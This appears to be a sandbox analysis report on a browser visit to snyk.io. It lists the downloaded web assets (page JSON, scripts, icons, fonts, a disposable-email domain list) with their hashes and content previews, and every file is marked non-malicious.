                                                                                                                                                                                                                                                                                                              SHA-256:297C1877DEA7336FA0C25128D5A779BF91ECF600A14425284D7D4F7A780C0849
                                                                                                                                                                                                                                                                                                              SHA-512:2F85BE05BDBE3729676CD2DBEC5403A0550BCF229023364754B840657AB6BC351EC9EAD6BBF20E594A67F6BE882F84F13AE13467AD4001D5F6F535A1CE959F58
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/snyk-top-10.json?slug=snyk-top-10
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"3ZCwCoYITTiz8r20WAi4D0","type":"Entry","createdAt":"2023-03-15T14:38:01.012Z","updatedAt":"2023-07-18T01:50:00.164Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":54,"revision":5,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"\"snyk top 10\" - landing page","title":"Snyk Top 10 Vulnerabilities | Snyk","slug":"snyk-top-10-vulnerabilities-or-snyk","uri":"snyk-top-10","pageLocalization":["ja"],"featuredImage":[{"url":"http://res.cloudinary.com/snyk/image/upload/v1678773524/snyk-top-10/feature-snyk-top-10-oss-2022.jpg","tags":[],"type":"upload","bytes":298679,"width":1200,"format":"jpg","height":628,"version":1678773524,"duration":null,"metadata":[],"public_id":"snyk-top-10/feature-snyk-top-10-oss-2022","created_at":"2
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):1827
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.789742547111478
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:YmTHpdS3SKtHPaX+WGM+6bqH119pTMb0fKOhqbQRkVubJts1K:tTNKtvAGM+iqH1pTfKOhqbQRkVub/sQ
                                                                                                                                                                                                                                                                                                              MD5:672ED876D94B9AC8D10AAC5F6C4054DD
                                                                                                                                                                                                                                                                                                              SHA1:89BF7D137FB563CB060C967969D319CAE7F5807C
                                                                                                                                                                                                                                                                                                              SHA-256:F5D674B1351517C72FE4667A79D8379AA6946BD4F4F186018D843784BD8B752B
                                                                                                                                                                                                                                                                                                              SHA-512:D8A24DD770946272FC9968E943EFC8229985DBFAA3EAD04BA0BF93D00282877E917EAC8100B0B0440A6378970406E88B667779984ADA96A76B54D812B95E3200
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://res.cloudinary.com/snyk/image/upload/snyk-mktg-brandui/brand-icons/integrations.svg
                                                                                                                                                                                                                                                                                                              Preview:<svg fill="none" viewBox="0 0 64 64" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><linearGradient id="a" gradientUnits="userSpaceOnUse" x1="4" x2="59.8364" y1="4" y2="49.0471"><stop offset="0" stop-color="#9043c6"/><stop offset="1" stop-color="#0a26b8"/></linearGradient><linearGradient id="b" gradientUnits="userSpaceOnUse" x1="60" x2="24.0154" y1="22" y2="49.5836"><stop offset="0" stop-color="#4bd6b5"/><stop offset="1" stop-color="#145deb"/></linearGradient><g clip-rule="evenodd" fill-rule="evenodd"><path d="m27.5 59.9867c-.1247.0177-.2513.0177-.376 0-15.7794-5.2786-23.12277-15.9992-23.12277-33.7929v-13.9832c-.01186-.2571.06238-.5108.21116-.7216.14878-.2107.36372-.3668.6113-.4437l22.32381-6.99163c.2295-.07156.4755-.07156.705 0l22.3238 6.99163c.2476.0769.4625.233.6113.4437.1488.2108.223.4645.2112.7216v7.1963c-1.4541-.8919-3.1646-1.4069-4.9988-1.4069-5.3202 0-9.6 4.3329-9.6 9.6296 0 .131.0026.2618.0079.3922l-2.8928-.0218h-.0151c-1.6248 0-2.9741.7378-3.865
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (10380), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):10380
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.672662832928799
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:i6FUM8PlpbbpilbLVEKttmkuYaG25GvnyfS8HiGBYypxEntxpKdmgeGZNMWGUqpi:dUFJpixLVr4ku6R8BdaSe6XeEJ
                                                                                                                                                                                                                                                                                                              MD5:A6BEE80115850D6AF1DFC80F705E9AB7
                                                                                                                                                                                                                                                                                                              SHA1:36A2913FDD5932658593BC18B2FFB522778351B2
                                                                                                                                                                                                                                                                                                              SHA-256:D6ACF33945E326E29302FC4D888CBD3C794079F1F647E203EC447E6F15053634
                                                                                                                                                                                                                                                                                                              SHA-512:5337ACE4ACA07EF195CA73BEF06477E0BC8B49F540B00C29CA94FBFD94974D390FE53FE102718147B7902A9D67E3EE307386028DF3481AAB91937C3389879F07
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/static/chunks/2135-5b964b3926facfba.js
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2135],{22135:function(e,n,t){var r,E,o,c,L,S,u,a,O,i,_,B,C,I,d,K,N=function(){return(N=Object.assign||function(e){for(var n,t=1,r=arguments.length;t<r;t++)for(var E in n=arguments[t])Object.prototype.hasOwnProperty.call(n,E)&&(e[E]=n[E]);return e}).apply(this,arguments)};"function"==typeof SuppressedError&&SuppressedError;var T="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof window?window:void 0!==t.g?t.g:"undefined"!=typeof self?self:{},D={},A={};Object.defineProperty(A,"__esModule",{value:!0}),A.BLOCKS=void 0,(r=B||(A.BLOCKS=B={})).DOCUMENT="document",r.PARAGRAPH="paragraph",r.HEADING_1="heading-1",r.HEADING_2="heading-2",r.HEADING_3="heading-3",r.HEADING_4="heading-4",r.HEADING_5="heading-5",r.HEADING_6="heading-6",r.OL_LIST="ordered-list",r.UL_LIST="unordered-list",r.LIST_ITEM="list-item",r.HR="hr",r.QUOTE="blockquote",r.EMBEDDED_ENTRY="embedded-entry-block",r.EMBEDDED_ASSET="embedded-asset-block",r
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (51425), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):51449
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.165172322409541
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:UxXESOPBOxtOHYldgjbPh7LXBLTfqfobEMVvpxl+fm9re9PE8waMe:QUSgBOxEHEgjbp7LXBLTweXr9faMe
                                                                                                                                                                                                                                                                                                              MD5:B412936E97D581B80080C8DFB21C8F61
                                                                                                                                                                                                                                                                                                              SHA1:251DBB096EE8D23E54D83A010ADA4B1513BC6B9F
                                                                                                                                                                                                                                                                                                              SHA-256:7257538940DA97291AED70867A081BE37C2C1708F3DB76D5F54B0E8575B32D88
                                                                                                                                                                                                                                                                                                              SHA-512:253D74F4775C5ED0234F2206571C5E6B6884EB6B8B7A22ACC372E03C9E4857BF69FECAEDDBFEDFA4F4B8C2D3257E8B6A1347EE51F51626601AC0DBC0875B6690
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/customers.json?slug=customers
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"fu1HALR4r60E7GmE8Aqkb","type":"Entry","createdAt":"2024-03-22T10:06:07.385Z","updatedAt":"2024-08-14T16:49:15.052Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":35,"revision":5,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Customers default page","title":"Customers | Customers Stories & Case Studies | Snyk","slug":"customers-or-snyk","uri":"customers","pageLocalization":["fr","ja","pt-BR","de"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"63Our3QnDuFGaQktiuwA5H","type":"Entry","createdAt":"2024-03-19T14:02:12.102Z","updatedAt":"2024-10-18T15:53:16.621Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Envi
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4880), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):4880
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.835030170852228
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:1gWUfvlcY021mvn1blhad7OIJoodnbUp2dEjkRUiptt:1DY0hf1bT47OIqWb1fptt
                                                                                                                                                                                                                                                                                                              MD5:4E410EDBF91E5E58D3C08EF14ADCD152
                                                                                                                                                                                                                                                                                                              SHA1:53C88D00632D6A4F09158F7C4A804F520E8D0BAB
                                                                                                                                                                                                                                                                                                              SHA-256:1CB96B337DC887097E538BAF7741B5D0CE231D13E6E49AEF8A31A83C34AE24BC
                                                                                                                                                                                                                                                                                                              SHA-512:CFFDF48F67BC179A594B8AE607DA1AC3A31EBC670C1B97C0B80A42E0612BAA9A9B61AC5C19A4DE36608CEF4BDABA7587C8F1017F3C101B9DA4212522A6567917
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):82
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.383594884337988
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:qGGAW6yIA6qENKAQpnDTLTrAWRgn:kAYIZYpDHTRg
                                                                                                                                                                                                                                                                                                              MD5:2ECE426E3900FA6EBAD39380AEAA2539
                                                                                                                                                                                                                                                                                                              SHA1:24C4E875361BC77874B005F816D160223DC68B46
                                                                                                                                                                                                                                                                                                              SHA-256:E4CE65C3A33FDF0AD73B34857BFF62AF3A6187509551AFBFECBA345FEA02BF55
                                                                                                                                                                                                                                                                                                              SHA-512:66A11A88F239BC8AD325671B2EADDFE0F88CC1EFDD4FA08E83D2FCA2E615DB4A101B935AD89F274B606F0C6DFF41BE575708268E8FB34F897EC28F7D8024BC65
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{. "success": false,. "message": "malformed JSON",. "code": "invalid_request".}
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):370
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.950379705524843
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6:Y9KJLqUMimOuIii/uYxbQ60tV/4edJFxJCYHJdt7IyJBp/cLYJHr5EYnYpJLT6:YwLuBaWYxbQxpFxJTHJx2YLyJr6
                                                                                                                                                                                                                                                                                                              MD5:4FA644AAEB750C31EAA6B786B8476B1A
                                                                                                                                                                                                                                                                                                              SHA1:1EA03F342F297DBEA950C2851AA98D51260B1034
                                                                                                                                                                                                                                                                                                              SHA-256:325A681244162E8594C3799042FFA1604224637FCB4AF847E84CD7B549FB0496
                                                                                                                                                                                                                                                                                                              SHA-512:BF7759CC95B970DFFE1780494FEE131FA5CEFEA5439AA83B54B88C43E542EB6D7B60DABEDF47A7174C9C6896DD7D307354374BB517DAA8516840373402F1C85E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://api.usercentrics.eu/ruleSet/FLMnthfCCTbMOO.json
                                                                                                                                                                                                                                                                                                              Preview:{"description":"Rules for all countries, separating CCPA for all and GDPR for EU only","rules":[{"settingsId":"HJ-Jgu0__ikv-k","name":"GDPR - (EU / UK only)","locations":["AT","BE","BG","HR","CY","CZ","DK","EE","FI","FR","DE","GR","HU","IE","IT","LV","LT","LU","MT","NL","PL","PT","RO","SI","SK","ES","SE","GB"]}],"defaultRule":{"settingsId":"Zz23KCbJ4","noShow":false}}
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):370
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.5969897580127865
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6:2LGaUImyCp0GlYM1wBJPyQK5DrIt6xfeGYqX3ofWLGJw47Jsr4z+LAltEJJsVsVo:2ffmyCkMwykgIaoO4nsrqHdyyv
                                                                                                                                                                                                                                                                                                              MD5:9C2160161305054AF467EA797A7C408F
                                                                                                                                                                                                                                                                                                              SHA1:8B427BC141874CC164E2BE3DB02079FCC99AF9ED
                                                                                                                                                                                                                                                                                                              SHA-256:7F47F02C93D5DE5DE03DB0EBFFA39FE1060767437B086996E295C9818A05B2F2
                                                                                                                                                                                                                                                                                                              SHA-512:FCCC6474CC18139B34DC40F6009C358753658E34CC2DF5B7D2C4E253BFE9647957A2FD23F30C86EC2087C2B250BCB0C570BB9EEF54B10DF6C4A3A6659F56F228
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://bat.bing.com/p/action/56377455.js
                                                                                                                                                                                                                                                                                                              Preview:(function(w,d,c,k,a,b,t,e) {.. var cs = d.currentScript;.. if (cs) {.. var uo = cs.getAttribute('data-ueto');.. if (uo && w[uo] && typeof w[uo].setUserSignals === 'function') {.. w[uo].setUserSignals({'co': c, 'kc': k, 'at': a, 'bi': b, 'dt': t, 'ec': e});.. }.. }..})(window, document, 'us', true, false, false, false, false);..
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):17818
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.010591760485862
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:h9fnA1pCYnzNckHLzv0Z60/9jnegW6PHvM5PK3wlMGXxnr1cr22V38bNtn4PlRK3:HnupCwf3vj0/oo+iar1crin4PzK9h
                                                                                                                                                                                                                                                                                                              MD5:CBD933EDF2C2DCBC907F628A543CC83E
                                                                                                                                                                                                                                                                                                              SHA1:AB4B426EA80B81531F6B7F54230A5744E21CD2D0
                                                                                                                                                                                                                                                                                                              SHA-256:1D01E0D3568325D5BBAEF2D60CEAABF47C0718AA35FA9980459A0C710552E040
                                                                                                                                                                                                                                                                                                              SHA-512:898AD480DAC0B96AB78B2E27F7BAC29AA82270D6B678A79E5A603CEE32C12564029D58C9BA4ECBAB517184C347A9EDF172A2EB17610BA53F96777EDA63664D63
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://go.snyk.io/rs/677-THP-415/images/businessemaildomainonly.js?version=1
                                                                                                                                                                                                                                                                                                              Preview:./**. * @author Sanford Whiteman. * @version v1.2 2024-05-14. * @copyright . 2024 Sanford Whiteman. * @license Hippocratic 2.1: This license must appear with all reproductions of this software.. * . *. */.. const interestingDomains = [. "0815.ru",. "0wnd.net",. "0wnd.org",. "10minutemail.co.za",. "10minutemail.com",. "123-m.com",. "1fsdfdsfsdf.tk",. "1pad.de",. "20minutemail.com",. "21cn.com",. "2fdgdfgdfgdf.tk",. "2prong.com",. "30minutemail.com",. "33mail.com",. "3trtretgfrfe.tk",. "4gfdsgfdgfd.tk",. "4warding.com",. "5ghgfhfghfgh.tk",. "6hjgjhgkilkj.tk",. "6paq.com",. "7tags.com",. "9ox.net",. "a-bc.net",. "agedmail.com",. "ama-trade.de",. "amilegit.com",. "amiri.net",. "amiriindustries.com",. "anonmails.de",. "anonymbox.com",.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):15086
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.174836608632289
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:uSigNb1OOOOO1OOOOOZOOOOOFOOOOOZoqOO31OOiOg4E1+/OO8OGwOUOZOXOO4OJ:uSLO20+Rn
                                                                                                                                                                                                                                                                                                              MD5:DED7E6A096971A6BE447198B6D2D013A
                                                                                                                                                                                                                                                                                                              SHA1:3E5BE2EF6E8EB7F39C13D94503DDADC3C98806E8
                                                                                                                                                                                                                                                                                                              SHA-256:51529E0966473C5BD68677B91F609C6CA6436674A3A9D4A7F1CC81064EA2CF1F
                                                                                                                                                                                                                                                                                                              SHA-512:AEAB157873971B7983F7E3AE272E832CF34783028EE66433C08D70F78EA9BDFD4C72B19065B9C0524E345C45995A62BF3271B36C40E3A2C3A016AE45CC19A959
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:............ .h...6... .... .........00.... ..%..F...(....... ..... .............................Q02j`<>.zRR.rST.xVX.pLM.wPP.d<=.d@A.rST.`<>.b::.X56.Q02d........Q02d`<>.wPP..dg..z|.xVX.wPP.d<=.rST..qv.iJN.b::.X56.Q02]........P01S`<>.wPP..qv......lt.wPP.f>=.hS^.tw..hS^.b::.U46.P.0N........P/1BZ8:.wPP.~\_..dg.xVX.wPP.f>=.d<=.iJN.gCF.b::.S24.Q028........Q028V46.wPP.zRR.zRR.zRR.wPP.f>=.b::.b::.b::.b::.V46.O-.-........Q02]U46.tNN.zRR.zRR.zRR.wPP.f>=.b::.b::.b::._9:.U46.P01S....Q.0.R24.\BG.d@A.wPP.`<>.d@A.gCF._9:.X56.X56.b::.X56.W<B.R13.Q.0.O-.-Z@E...\BG.`<>.S36.Q02.R24.R24.Q13.R13.X56.W<B.ns..V<B.P-.#O-.-Z@E...pdr.Q/0.R13W....Q/1.Q/1.....Q02]Q/1.bYj.u...V<B.P-.#Q.0.R13..~......S24.Q028................Q028S24.ns..kl..R13.Q/1.....Q02]hS^.....V8<.P-.#................P-.#V8<.qz..\JU.P.0N........Q.0.V8<.pdr.V8<.Q/1.................Q.0.V8<.bYj.S36.Q/1.............Q02jU46.R13.Q/1.................Q.0.R13.U46.Q02]................Q.0.R13.R13.........................R13.R13.Q/1...................
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (61451), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):61492
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.13067928793062
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:qAKnN5uyffCgsPj4qKms7EMVvpxl+fm9re9PE8waMe:lKN5uqs0HTXr9faMe
                                                                                                                                                                                                                                                                                                              MD5:5620D76FC3A2081C068E2BD382252F19
                                                                                                                                                                                                                                                                                                              SHA1:3FCA793460268822CD564A3DCB7408A97563F012
                                                                                                                                                                                                                                                                                                              SHA-256:343C2B526F139CA56DE0BFB32F7A481A6681A82F6659C85BEA63BBA02D697114
                                                                                                                                                                                                                                                                                                              SHA-512:08EB534040339695FA63F2124FE013A48103A10CBC5931C9DCE4973872B37D8F957044819B2FF76C706B4CD2AD069F6E2A6EA18D2B6F3ABB8B5EEC7953AEB2A6
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"6Em0p3H7LGi8YxdfABF5XP","type":"Entry","createdAt":"2022-11-10T18:03:38.782Z","updatedAt":"2023-06-28T18:22:05.240Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":41,"revision":11,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Community - Snyk Ambassadors page","title":"Snyk Ambassador Program | Snyk","slug":"snyk-ambassadors","uri":"snyk-ambassadors","featuredImage":[{"url":"http://res.cloudinary.com/snyk/image/upload/v1628807053/wordpress-sync/ambassadors-program.png","tags":[],"type":"upload","bytes":265659,"width":1200,"format":"png","height":628,"context":{"custom":{"guid":"96ee64c864c26b844f1998974734a5f1","caption":"ambassadors-program","cld_wp_plugin":"1"}},"version":1628807053,"duration":null,"metadata":[]
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65533), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):115952
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.08585199829037
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:TF2kDFEFRQvb1x89Ow3PDJJYJ1yiuDXkZ9XcpMQIHljDeqQeZ4lA5uhJ07vgYCCG:UHt6SLN
                                                                                                                                                                                                                                                                                                              MD5:F4DCDD755FA583B0D99067BE1A392094
                                                                                                                                                                                                                                                                                                              SHA1:3E5DB2395FBA8372966C06259F410935F5F8E3D2
                                                                                                                                                                                                                                                                                                              SHA-256:28B1F1536EC23D0EC464DAB4D4C3B4BCB30EB5FE924FD85C6E4D79ECACDB4F20
                                                                                                                                                                                                                                                                                                              SHA-512:5681B7C3E3BBFDFBB5DF7D5B5ED5F4BF36BA32E8CD522D1142643DECF379344A824DE84654E14E77BDA6154B56CB99C22AD9CB206FDED864CCB5E5C614C663FC
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"3b01oc5xKdJHrnwd3O3bMn","type":"Entry","createdAt":"2023-12-07T11:13:41.196Z","updatedAt":"2024-05-01T11:45:05.332Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":39,"revision":10,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"\"Pricing\" - Updated","title":"Plans","slug":"plans-updated","uri":"plans","pageLocalization":["ja","fr","pt-BR","de"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"6U9SYGWPVg5MK8lNrhS1Dg","type":"Entry","createdAt":"2023-07-31T16:00:39.968Z","updatedAt":"2024-07-16T03:25:41.743Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":67,"revision":24,"conte
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):25368
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.448645916167072
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:w5+byAtJBgDaDlZR2jdz+kOKRw31uaDfxfOZvkwuwb0EzziAEA5AMAXA/AdK2K6w:w5+MnxiZQ4sp9CO7v
                                                                                                                                                                                                                                                                                                              MD5:9704BC0E9547019B7CE74D9445AE8E12
                                                                                                                                                                                                                                                                                                              SHA1:638FC980C54179AAF3C73BC299E7071525D29EFE
                                                                                                                                                                                                                                                                                                              SHA-256:E0DD1F32B9A3FA212BE92825E35A1431C1E271AFAEEFC14EED457B39928C7DBB
                                                                                                                                                                                                                                                                                                              SHA-512:75AA0E31436F7A1EF70CE560B93A7B7796C6C21848B46EC48C659CDEE6064D945E5DE98770FF82DA656EF8B21E3EBD79714CC5B1E23CCFC6ED9A691878AB3784
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:"https://fonts.googleapis.com/css2?family=Big+Shoulders+Display:wght@100..900&family=Poppins:ital,wght@0,400;0,600;0,700;1,400;1,600;1,700&family=Roboto+Mono:ital,wght@0,100..700;1,100..700&family=Roboto:ital,wght@0,400;0,500;0,700;1,400;1,500;1,700&display=swap"
                                                                                                                                                                                                                                                                                                              Preview:/* vietnamese */.@font-face {. font-family: 'Big Shoulders Display';. font-style: normal;. font-weight: 100 900;. font-display: swap;. src: url(https://fonts.gstatic.com/s/bigshouldersdisplay/v21/fC1_PZJEZG-e9gHhdI4-NBbfd2ys3SjJCx1cw9DuHpM.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;.}./* latin-ext */.@font-face {. font-family: 'Big Shoulders Display';. font-style: normal;. font-weight: 100 900;. font-display: swap;. src: url(https://fonts.gstatic.com/s/bigshouldersdisplay/v21/fC1_PZJEZG-e9gHhdI4-NBbfd2ys3SjJCx1cwtDuHpM.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Big Shoulders Display';. font-sty
                                                                                                                                                                                                                                                                                                              No static file info
                                                                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:48:43.323367119 CEST49675443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:48:43.323388100 CEST49674443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                              Oct 24, 2024 21:48:43.448321104 CEST49673443192.168.2.523.1.237.91
